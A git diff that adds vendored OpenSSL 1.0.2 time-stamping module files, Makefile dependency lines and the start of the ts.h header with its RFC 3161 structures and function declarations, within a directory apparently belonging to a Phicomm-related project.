+ts_rsp_sign.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_rsp_sign.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_rsp_sign.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_rsp_sign.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_rsp_sign.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_rsp_sign.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_rsp_sign.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ts_rsp_sign.o: ../../include/openssl/opensslconf.h
+ts_rsp_sign.o: ../../include/openssl/opensslv.h
+ts_rsp_sign.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_rsp_sign.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_rsp_sign.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_rsp_sign.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_rsp_sign.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_rsp_sign.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_rsp_sign.c
+ts_rsp_utils.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_rsp_utils.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_rsp_utils.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_rsp_utils.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_rsp_utils.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_rsp_utils.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_rsp_utils.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+ts_rsp_utils.o: ../../include/openssl/opensslconf.h
+ts_rsp_utils.o: ../../include/openssl/opensslv.h
+ts_rsp_utils.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_rsp_utils.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_rsp_utils.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_rsp_utils.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_rsp_utils.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_rsp_utils.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_rsp_utils.c
+ts_rsp_verify.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_rsp_verify.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_rsp_verify.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_rsp_verify.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_rsp_verify.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_rsp_verify.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_rsp_verify.o: ../../include/openssl/obj_mac.h
+ts_rsp_verify.o: ../../include/openssl/objects.h
+ts_rsp_verify.o: ../../include/openssl/opensslconf.h
+ts_rsp_verify.o: ../../include/openssl/opensslv.h
+ts_rsp_verify.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_rsp_verify.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_rsp_verify.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_rsp_verify.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_rsp_verify.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_rsp_verify.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_rsp_verify.c
+ts_verify_ctx.o: ../../e_os.h ../../include/openssl/asn1.h
+ts_verify_ctx.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+ts_verify_ctx.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+ts_verify_ctx.o: ../../include/openssl/dh.h ../../include/openssl/dsa.h
+ts_verify_ctx.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+ts_verify_ctx.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+ts_verify_ctx.o: ../../include/openssl/obj_mac.h
+ts_verify_ctx.o: ../../include/openssl/objects.h
+ts_verify_ctx.o: ../../include/openssl/opensslconf.h
+ts_verify_ctx.o: ../../include/openssl/opensslv.h
+ts_verify_ctx.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+ts_verify_ctx.o: ../../include/openssl/rsa.h ../../include/openssl/safestack.h
+ts_verify_ctx.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+ts_verify_ctx.o: ../../include/openssl/symhacks.h ../../include/openssl/ts.h
+ts_verify_ctx.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+ts_verify_ctx.o: ../../include/openssl/x509v3.h ../cryptlib.h ts_verify_ctx.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/lib b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/lib
new file mode 100644
index 0000000..e69de29
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts.h
new file mode 100644
index 0000000..16eccbb
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ts/ts.h
@@ -0,0 +1,862 @@
+/* crypto/ts/ts.h */
+/*
+ * Written by Zoltan Glozik (zglozik@opentsa.org) for the OpenSSL project
+ * 2002, 2003, 2004.
+ */
+/* ====================================================================
+ * Copyright (c) 2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_TS_H
+# define HEADER_TS_H
+
+# include <openssl/opensslconf.h>
+# include <openssl/symhacks.h>
+# ifndef OPENSSL_NO_BUFFER
+#  include <openssl/buffer.h>
+# endif
+# ifndef OPENSSL_NO_EVP
+#  include <openssl/evp.h>
+# endif
+# ifndef OPENSSL_NO_BIO
+#  include <openssl/bio.h>
+# endif
+# include <openssl/stack.h>
+# include <openssl/asn1.h>
+# include <openssl/safestack.h>
+
+# ifndef OPENSSL_NO_RSA
+#  include <openssl/rsa.h>
+# endif
+
+# ifndef OPENSSL_NO_DSA
+#  include <openssl/dsa.h>
+# endif
+
+# ifndef OPENSSL_NO_DH
+#  include <openssl/dh.h>
+# endif
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# ifdef WIN32
+/* Under Win32 this is defined in wincrypt.h */
+#  undef X509_NAME
+# endif
+
+# include <openssl/x509.h>
+# include <openssl/x509v3.h>
+
+/*-
+MessageImprint ::= SEQUENCE  {
+     hashAlgorithm                AlgorithmIdentifier,
+     hashedMessage                OCTET STRING  }
+*/
+
+typedef struct TS_msg_imprint_st {
+    X509_ALGOR *hash_algo;
+    ASN1_OCTET_STRING *hashed_msg;
+} TS_MSG_IMPRINT;
+
+/*-
+TimeStampReq ::= SEQUENCE  {
+   version                  INTEGER  { v1(1) },
+   messageImprint           MessageImprint,
+     --a hash algorithm OID and the hash value of the data to be
+     --time-stamped
+   reqPolicy                TSAPolicyId                OPTIONAL,
+   nonce                    INTEGER                    OPTIONAL,
+   certReq                  BOOLEAN                    DEFAULT FALSE,
+   extensions               [0] IMPLICIT Extensions    OPTIONAL  }
+*/
+
+typedef struct TS_req_st {
+    ASN1_INTEGER *version;
+    TS_MSG_IMPRINT *msg_imprint;
+    ASN1_OBJECT *policy_id;     /* OPTIONAL */
+    ASN1_INTEGER *nonce;        /* OPTIONAL */
+    ASN1_BOOLEAN cert_req;      /* DEFAULT FALSE */
+    STACK_OF(X509_EXTENSION) *extensions; /* [0] OPTIONAL */
+} TS_REQ;
+
+/*-
+Accuracy ::= SEQUENCE {
+                seconds        INTEGER           OPTIONAL,
+                millis     [0] INTEGER  (1..999) OPTIONAL,
+                micros     [1] INTEGER  (1..999) OPTIONAL  }
+*/
+
+typedef struct TS_accuracy_st {
+    ASN1_INTEGER *seconds;
+    ASN1_INTEGER *millis;
+    ASN1_INTEGER *micros;
+} TS_ACCURACY;
+
+/*-
+TSTInfo ::= SEQUENCE  {
+    version                      INTEGER  { v1(1) },
+    policy                       TSAPolicyId,
+    messageImprint               MessageImprint,
+      -- MUST have the same value as the similar field in
+      -- TimeStampReq
+    serialNumber                 INTEGER,
+     -- Time-Stamping users MUST be ready to accommodate integers
+     -- up to 160 bits.
+    genTime                      GeneralizedTime,
+    accuracy                     Accuracy                 OPTIONAL,
+    ordering                     BOOLEAN             DEFAULT FALSE,
+    nonce                        INTEGER                  OPTIONAL,
+      -- MUST be present if the similar field was present
+      -- in TimeStampReq.  In that case it MUST have the same value.
+    tsa                          [0] GeneralName          OPTIONAL,
+    extensions                   [1] IMPLICIT Extensions  OPTIONAL   }
+*/
+
+typedef struct TS_tst_info_st {
+    ASN1_INTEGER *version;
+    ASN1_OBJECT *policy_id;
+    TS_MSG_IMPRINT *msg_imprint;
+    ASN1_INTEGER *serial;
+    ASN1_GENERALIZEDTIME *time;
+    TS_ACCURACY *accuracy;
+    ASN1_BOOLEAN ordering;
+    ASN1_INTEGER *nonce;
+    GENERAL_NAME *tsa;
+    STACK_OF(X509_EXTENSION) *extensions;
+} TS_TST_INFO;
+
+/*-
+PKIStatusInfo ::= SEQUENCE {
+    status        PKIStatus,
+    statusString  PKIFreeText     OPTIONAL,
+    failInfo      PKIFailureInfo  OPTIONAL  }
+
+From RFC 1510 - section 3.1.1:
+PKIFreeText ::= SEQUENCE SIZE (1..MAX) OF UTF8String
+        -- text encoded as UTF-8 String (note:  each UTF8String SHOULD
+        -- include an RFC 1766 language tag to indicate the language
+        -- of the contained text)
+*/
+
+/* Possible values for status. See ts_resp_print.c && ts_resp_verify.c. */
+
+# define TS_STATUS_GRANTED                       0
+# define TS_STATUS_GRANTED_WITH_MODS             1
+# define TS_STATUS_REJECTION                     2
+# define TS_STATUS_WAITING                       3
+# define TS_STATUS_REVOCATION_WARNING            4
+# define TS_STATUS_REVOCATION_NOTIFICATION       5
+
+/*
+ * Possible values for failure_info. See ts_resp_print.c && ts_resp_verify.c
+ */
+
+# define TS_INFO_BAD_ALG                 0
+# define TS_INFO_BAD_REQUEST             2
+# define TS_INFO_BAD_DATA_FORMAT         5
+# define TS_INFO_TIME_NOT_AVAILABLE      14
+# define TS_INFO_UNACCEPTED_POLICY       15
+# define TS_INFO_UNACCEPTED_EXTENSION    16
+# define TS_INFO_ADD_INFO_NOT_AVAILABLE  17
+# define TS_INFO_SYSTEM_FAILURE          25
+
+typedef struct TS_status_info_st {
+    ASN1_INTEGER *status;
+    STACK_OF(ASN1_UTF8STRING) *text;
+    ASN1_BIT_STRING *failure_info;
+} TS_STATUS_INFO;
+
+DECLARE_STACK_OF(ASN1_UTF8STRING)
+DECLARE_ASN1_SET_OF(ASN1_UTF8STRING)
+
+/*-
+TimeStampResp ::= SEQUENCE  {
+     status                  PKIStatusInfo,
+     timeStampToken          TimeStampToken     OPTIONAL }
+*/
+
+typedef struct TS_resp_st {
+    TS_STATUS_INFO *status_info;
+    PKCS7 *token;
+    TS_TST_INFO *tst_info;
+} TS_RESP;
+
+/* The structure below would belong to the ESS component. */
+
+/*-
+IssuerSerial ::= SEQUENCE {
+        issuer                   GeneralNames,
+        serialNumber             CertificateSerialNumber
+        }
+*/
+
+typedef struct ESS_issuer_serial {
+    STACK_OF(GENERAL_NAME) *issuer;
+    ASN1_INTEGER *serial;
+} ESS_ISSUER_SERIAL;
+
+/*-
+ESSCertID ::=  SEQUENCE {
+        certHash                 Hash,
+        issuerSerial             IssuerSerial OPTIONAL
+}
+*/
+
+typedef struct ESS_cert_id {
+    ASN1_OCTET_STRING *hash;    /* Always SHA-1 digest. */
+    ESS_ISSUER_SERIAL *issuer_serial;
+} ESS_CERT_ID;
+
+DECLARE_STACK_OF(ESS_CERT_ID)
+DECLARE_ASN1_SET_OF(ESS_CERT_ID)
+
+/*-
+SigningCertificate ::=  SEQUENCE {
+       certs        SEQUENCE OF ESSCertID,
+       policies     SEQUENCE OF PolicyInformation OPTIONAL
+}
+*/
+
+typedef struct ESS_signing_cert {
+    STACK_OF(ESS_CERT_ID) *cert_ids;
+    STACK_OF(POLICYINFO) *policy_info;
+} ESS_SIGNING_CERT;
+
+TS_REQ *TS_REQ_new(void);
+void TS_REQ_free(TS_REQ *a);
+int i2d_TS_REQ(const TS_REQ *a, unsigned char **pp);
+TS_REQ *d2i_TS_REQ(TS_REQ **a, const unsigned char **pp, long length);
+
+TS_REQ *TS_REQ_dup(TS_REQ *a);
+
+TS_REQ *d2i_TS_REQ_fp(FILE *fp, TS_REQ **a);
+int i2d_TS_REQ_fp(FILE *fp, TS_REQ *a);
+TS_REQ *d2i_TS_REQ_bio(BIO *fp, TS_REQ **a);
+int i2d_TS_REQ_bio(BIO *fp, TS_REQ *a);
+
+TS_MSG_IMPRINT *TS_MSG_IMPRINT_new(void);
+void TS_MSG_IMPRINT_free(TS_MSG_IMPRINT *a);
+int i2d_TS_MSG_IMPRINT(const TS_MSG_IMPRINT *a, unsigned char **pp);
+TS_MSG_IMPRINT *d2i_TS_MSG_IMPRINT(TS_MSG_IMPRINT **a,
+                                   const unsigned char **pp, long length);
+
+TS_MSG_IMPRINT *TS_MSG_IMPRINT_dup(TS_MSG_IMPRINT *a);
+
+TS_MSG_IMPRINT *d2i_TS_MSG_IMPRINT_fp(FILE *fp, TS_MSG_IMPRINT **a);
+int i2d_TS_MSG_IMPRINT_fp(FILE *fp, TS_MSG_IMPRINT *a);
+TS_MSG_IMPRINT *d2i_TS_MSG_IMPRINT_bio(BIO *fp, TS_MSG_IMPRINT **a);
+int i2d_TS_MSG_IMPRINT_bio(BIO *fp, TS_MSG_IMPRINT *a);
+
+TS_RESP *TS_RESP_new(void);
+void TS_RESP_free(TS_RESP *a);
+int i2d_TS_RESP(const TS_RESP *a, unsigned char **pp);
+TS_RESP *d2i_TS_RESP(TS_RESP **a, const unsigned char **pp, long length);
+TS_TST_INFO *PKCS7_to_TS_TST_INFO(PKCS7 *token);
+TS_RESP *TS_RESP_dup(TS_RESP *a);
+
+TS_RESP *d2i_TS_RESP_fp(FILE *fp, TS_RESP **a);
+int i2d_TS_RESP_fp(FILE *fp, TS_RESP *a);
+TS_RESP *d2i_TS_RESP_bio(BIO *fp, TS_RESP **a);
+int i2d_TS_RESP_bio(BIO *fp, TS_RESP *a);
+
+TS_STATUS_INFO *TS_STATUS_INFO_new(void);
+void TS_STATUS_INFO_free(TS_STATUS_INFO *a);
+int i2d_TS_STATUS_INFO(const TS_STATUS_INFO *a, unsigned char **pp);
+TS_STATUS_INFO *d2i_TS_STATUS_INFO(TS_STATUS_INFO **a,
+                                   const unsigned char **pp, long length);
+TS_STATUS_INFO *TS_STATUS_INFO_dup(TS_STATUS_INFO *a);
+
+TS_TST_INFO *TS_TST_INFO_new(void);
+void TS_TST_INFO_free(TS_TST_INFO *a);
+int i2d_TS_TST_INFO(const TS_TST_INFO *a, unsigned char **pp);
+TS_TST_INFO *d2i_TS_TST_INFO(TS_TST_INFO **a, const unsigned char **pp,
+                             long length);
+TS_TST_INFO *TS_TST_INFO_dup(TS_TST_INFO *a);
+
+TS_TST_INFO *d2i_TS_TST_INFO_fp(FILE *fp, TS_TST_INFO **a);
+int i2d_TS_TST_INFO_fp(FILE *fp, TS_TST_INFO *a);
+TS_TST_INFO *d2i_TS_TST_INFO_bio(BIO *fp, TS_TST_INFO **a);
+int i2d_TS_TST_INFO_bio(BIO *fp, TS_TST_INFO *a);
+
+TS_ACCURACY *TS_ACCURACY_new(void);
+void TS_ACCURACY_free(TS_ACCURACY *a);
+int i2d_TS_ACCURACY(const TS_ACCURACY *a, unsigned char **pp);
+TS_ACCURACY *d2i_TS_ACCURACY(TS_ACCURACY **a, const unsigned char **pp,
+                             long length);
+TS_ACCURACY *TS_ACCURACY_dup(TS_ACCURACY *a);
+
+ESS_ISSUER_SERIAL *ESS_ISSUER_SERIAL_new(void);
+void ESS_ISSUER_SERIAL_free(ESS_ISSUER_SERIAL *a);
+int i2d_ESS_ISSUER_SERIAL(const ESS_ISSUER_SERIAL *a, unsigned char **pp);
+ESS_ISSUER_SERIAL *d2i_ESS_ISSUER_SERIAL(ESS_ISSUER_SERIAL **a,
+                                         const unsigned char **pp,
+                                         long length);
+ESS_ISSUER_SERIAL *ESS_ISSUER_SERIAL_dup(ESS_ISSUER_SERIAL *a);
+
+ESS_CERT_ID *ESS_CERT_ID_new(void);
+void ESS_CERT_ID_free(ESS_CERT_ID *a);
+int i2d_ESS_CERT_ID(const ESS_CERT_ID *a, unsigned char **pp);
+ESS_CERT_ID *d2i_ESS_CERT_ID(ESS_CERT_ID **a, const unsigned char **pp,
+                             long length);
+ESS_CERT_ID *ESS_CERT_ID_dup(ESS_CERT_ID *a);
+
+ESS_SIGNING_CERT *ESS_SIGNING_CERT_new(void);
+void ESS_SIGNING_CERT_free(ESS_SIGNING_CERT *a);
+int i2d_ESS_SIGNING_CERT(const ESS_SIGNING_CERT *a, unsigned char **pp);
+ESS_SIGNING_CERT *d2i_ESS_SIGNING_CERT(ESS_SIGNING_CERT **a,
+                                       const unsigned char **pp, long length);
+ESS_SIGNING_CERT *ESS_SIGNING_CERT_dup(ESS_SIGNING_CERT *a);
+
+void ERR_load_TS_strings(void);
+
+int TS_REQ_set_version(TS_REQ *a, long version);
+long TS_REQ_get_version(const TS_REQ *a);
+
+int TS_REQ_set_msg_imprint(TS_REQ *a, TS_MSG_IMPRINT *msg_imprint);
+TS_MSG_IMPRINT *TS_REQ_get_msg_imprint(TS_REQ *a);
+
+int TS_MSG_IMPRINT_set_algo(TS_MSG_IMPRINT *a, X509_ALGOR *alg);
+X509_ALGOR *TS_MSG_IMPRINT_get_algo(TS_MSG_IMPRINT *a);
+
+int TS_MSG_IMPRINT_set_msg(TS_MSG_IMPRINT *a, unsigned char *d, int len);
+ASN1_OCTET_STRING *TS_MSG_IMPRINT_get_msg(TS_MSG_IMPRINT *a);
+
+int TS_REQ_set_policy_id(TS_REQ *a, ASN1_OBJECT *policy);
+ASN1_OBJECT *TS_REQ_get_policy_id(TS_REQ *a);
+
+int TS_REQ_set_nonce(TS_REQ *a, const ASN1_INTEGER *nonce);
+const ASN1_INTEGER *TS_REQ_get_nonce(const TS_REQ *a);
+
+int TS_REQ_set_cert_req(TS_REQ *a, int cert_req);
+int TS_REQ_get_cert_req(const TS_REQ *a);
+
+STACK_OF(X509_EXTENSION) *TS_REQ_get_exts(TS_REQ *a);
+void TS_REQ_ext_free(TS_REQ *a);
+int TS_REQ_get_ext_count(TS_REQ *a);
+int TS_REQ_get_ext_by_NID(TS_REQ *a, int nid, int lastpos);
+int TS_REQ_get_ext_by_OBJ(TS_REQ *a, ASN1_OBJECT *obj, int lastpos);
+int TS_REQ_get_ext_by_critical(TS_REQ *a, int crit, int lastpos);
+X509_EXTENSION *TS_REQ_get_ext(TS_REQ *a, int loc);
+X509_EXTENSION *TS_REQ_delete_ext(TS_REQ *a, int loc);
+int TS_REQ_add_ext(TS_REQ *a, X509_EXTENSION *ex, int loc);
+void *TS_REQ_get_ext_d2i(TS_REQ *a, int nid, int *crit, int *idx);
+
+/* Function declarations for TS_REQ defined in ts/ts_req_print.c */
+
+int TS_REQ_print_bio(BIO *bio, TS_REQ *a);
+
+/* Function declarations for TS_RESP defined in ts/ts_resp_utils.c */
+
+int TS_RESP_set_status_info(TS_RESP *a, TS_STATUS_INFO *info);
+TS_STATUS_INFO *TS_RESP_get_status_info(TS_RESP *a);
+
+/* Caller loses ownership of PKCS7 and TS_TST_INFO objects. */
+void TS_RESP_set_tst_info(TS_RESP *a, PKCS7 *p7, TS_TST_INFO *tst_info);
+PKCS7 *TS_RESP_get_token(TS_RESP *a);
+TS_TST_INFO *TS_RESP_get_tst_info(TS_RESP *a);
+
+int TS_TST_INFO_set_version(TS_TST_INFO *a, long version);
+long TS_TST_INFO_get_version(const TS_TST_INFO *a);
+
+int TS_TST_INFO_set_policy_id(TS_TST_INFO *a, ASN1_OBJECT *policy_id);
+ASN1_OBJECT *TS_TST_INFO_get_policy_id(TS_TST_INFO *a);
+
+int TS_TST_INFO_set_msg_imprint(TS_TST_INFO *a, TS_MSG_IMPRINT *msg_imprint);
+TS_MSG_IMPRINT *TS_TST_INFO_get_msg_imprint(TS_TST_INFO *a);
+
+int TS_TST_INFO_set_serial(TS_TST_INFO *a, const ASN1_INTEGER *serial);
+const ASN1_INTEGER *TS_TST_INFO_get_serial(const TS_TST_INFO *a);
+
+int TS_TST_INFO_set_time(TS_TST_INFO *a, const ASN1_GENERALIZEDTIME *gtime);
+const ASN1_GENERALIZEDTIME *TS_TST_INFO_get_time(const TS_TST_INFO *a);
+
+int TS_TST_INFO_set_accuracy(TS_TST_INFO *a, TS_ACCURACY *accuracy);
+TS_ACCURACY *TS_TST_INFO_get_accuracy(TS_TST_INFO *a);
+
+int TS_ACCURACY_set_seconds(TS_ACCURACY *a, const ASN1_INTEGER *seconds);
+const ASN1_INTEGER *TS_ACCURACY_get_seconds(const TS_ACCURACY *a);
+
+int TS_ACCURACY_set_millis(TS_ACCURACY *a, const ASN1_INTEGER *millis);
+const ASN1_INTEGER *TS_ACCURACY_get_millis(const TS_ACCURACY *a);
+
+int TS_ACCURACY_set_micros(TS_ACCURACY *a, const ASN1_INTEGER *micros);
+const ASN1_INTEGER *TS_ACCURACY_get_micros(const TS_ACCURACY *a);
+
+int TS_TST_INFO_set_ordering(TS_TST_INFO *a, int ordering);
+int TS_TST_INFO_get_ordering(const TS_TST_INFO *a);
+
+int TS_TST_INFO_set_nonce(TS_TST_INFO *a, const ASN1_INTEGER *nonce);
+const ASN1_INTEGER *TS_TST_INFO_get_nonce(const TS_TST_INFO *a);
+
+int TS_TST_INFO_set_tsa(TS_TST_INFO *a, GENERAL_NAME *tsa);
+GENERAL_NAME *TS_TST_INFO_get_tsa(TS_TST_INFO *a);
+
+STACK_OF(X509_EXTENSION) *TS_TST_INFO_get_exts(TS_TST_INFO *a);
+void TS_TST_INFO_ext_free(TS_TST_INFO *a);
+int TS_TST_INFO_get_ext_count(TS_TST_INFO *a);
+int TS_TST_INFO_get_ext_by_NID(TS_TST_INFO *a, int nid, int lastpos);
+int TS_TST_INFO_get_ext_by_OBJ(TS_TST_INFO *a, ASN1_OBJECT *obj, int lastpos);
+int TS_TST_INFO_get_ext_by_critical(TS_TST_INFO *a, int crit, int lastpos);
+X509_EXTENSION *TS_TST_INFO_get_ext(TS_TST_INFO *a, int loc);
+X509_EXTENSION *TS_TST_INFO_delete_ext(TS_TST_INFO *a, int loc);
+int TS_TST_INFO_add_ext(TS_TST_INFO *a, X509_EXTENSION *ex, int loc);
+void *TS_TST_INFO_get_ext_d2i(TS_TST_INFO *a, int nid, int *crit, int *idx);
+
+/*
+ * Declarations related to response generation, defined in ts/ts_resp_sign.c.
+ */
+
+/* Optional flags for response generation. */
+
+/* Don't include the TSA name in response. */
+# define TS_TSA_NAME             0x01
+
+/* Set ordering to true in response. */
+# define TS_ORDERING             0x02
+
+/*
+ * Include the signer certificate and the other specified certificates in
+ * the ESS signing certificate attribute beside the PKCS7 signed data.
+ * Only the signer certificates is included by default.
+ */
+# define TS_ESS_CERT_ID_CHAIN    0x04
+
+/* Forward declaration. */
+struct TS_resp_ctx;
+
+/* This must return a unique number less than 160 bits long. */
+typedef ASN1_INTEGER *(*TS_serial_cb) (struct TS_resp_ctx *, void *);
+
+/*
+ * This must return the seconds and microseconds since Jan 1, 1970 in the sec
+ * and usec variables allocated by the caller. Return non-zero for success
+ * and zero for failure.
+ */
+typedef int (*TS_time_cb) (struct TS_resp_ctx *, void *, long *sec,
+                           long *usec);
+
+/*
+ * This must process the given extension. It can modify the TS_TST_INFO
+ * object of the context. Return values: !0 (processed), 0 (error, it must
+ * set the status info/failure info of the response).
+ */
+typedef int (*TS_extension_cb) (struct TS_resp_ctx *, X509_EXTENSION *,
+                                void *);
+
+typedef struct TS_resp_ctx {
+    X509 *signer_cert;
+    EVP_PKEY *signer_key;
+    STACK_OF(X509) *certs;      /* Certs to include in signed data. */
+    STACK_OF(ASN1_OBJECT) *policies; /* Acceptable policies. */
+    ASN1_OBJECT *default_policy; /* It may appear in policies, too. */
+    STACK_OF(EVP_MD) *mds;      /* Acceptable message digests. */
+    ASN1_INTEGER *seconds;      /* accuracy, 0 means not specified. */
+    ASN1_INTEGER *millis;       /* accuracy, 0 means not specified. */
+    ASN1_INTEGER *micros;       /* accuracy, 0 means not specified. */
+    unsigned clock_precision_digits; /* fraction of seconds in time stamp
+                                      * token. */
+    unsigned flags;             /* Optional info, see values above. */
+    /* Callback functions. */
+    TS_serial_cb serial_cb;
+    void *serial_cb_data;       /* User data for serial_cb. */
+    TS_time_cb time_cb;
+    void *time_cb_data;         /* User data for time_cb. */
+    TS_extension_cb extension_cb;
+    void *extension_cb_data;    /* User data for extension_cb. */
+    /* These members are used only while creating the response. */
+    TS_REQ *request;
+    TS_RESP *response;
+    TS_TST_INFO *tst_info;
+} TS_RESP_CTX;
+
+DECLARE_STACK_OF(EVP_MD)
+DECLARE_ASN1_SET_OF(EVP_MD)
+
+/* Creates a response context that can be used for generating responses. */
+TS_RESP_CTX *TS_RESP_CTX_new(void);
+void TS_RESP_CTX_free(TS_RESP_CTX *ctx);
+
+/* This parameter must be set. */
+int TS_RESP_CTX_set_signer_cert(TS_RESP_CTX *ctx, X509 *signer);
+
+/* This parameter must be set. */
+int TS_RESP_CTX_set_signer_key(TS_RESP_CTX *ctx, EVP_PKEY *key);
+
+/* This parameter must be set. */
+int TS_RESP_CTX_set_def_policy(TS_RESP_CTX *ctx, ASN1_OBJECT *def_policy);
+
+/* No additional certs are included in the response by default. */
+int TS_RESP_CTX_set_certs(TS_RESP_CTX *ctx, STACK_OF(X509) *certs);
+
+/*
+ * Adds a new acceptable policy, only the default policy is accepted by
+ * default.
+ */
+int TS_RESP_CTX_add_policy(TS_RESP_CTX *ctx, ASN1_OBJECT *policy);
+
+/*
+ * Adds a new acceptable message digest. Note that no message digests are
+ * accepted by default. The md argument is shared with the caller.
+ */
+int TS_RESP_CTX_add_md(TS_RESP_CTX *ctx, const EVP_MD *md);
+
+/* Accuracy is not included by default. */
+int TS_RESP_CTX_set_accuracy(TS_RESP_CTX *ctx,
+                             int secs, int millis, int micros);
+
+/*
+ * Clock precision digits, i.e. the number of decimal digits: '0' means sec,
+ * '3' msec, '6' usec, and so on. Default is 0.
+ */
+int TS_RESP_CTX_set_clock_precision_digits(TS_RESP_CTX *ctx,
+                                           unsigned clock_precision_digits);
+/* At most we accept usec precision. */
+# define TS_MAX_CLOCK_PRECISION_DIGITS   6
+
+/* No flags are set by default. */
+void TS_RESP_CTX_add_flags(TS_RESP_CTX *ctx, int flags);
+
+/* Default callback always returns a constant. */
+void TS_RESP_CTX_set_serial_cb(TS_RESP_CTX *ctx, TS_serial_cb cb, void *data);
+
+/* Default callback uses the gettimeofday() and gmtime() system calls. */
+void TS_RESP_CTX_set_time_cb(TS_RESP_CTX *ctx, TS_time_cb cb, void *data);
+
+/*
+ * Default callback rejects all extensions. The extension callback is called
+ * when the TS_TST_INFO object is already set up and not signed yet.
+ */
+/* FIXME: extension handling is not tested yet. */
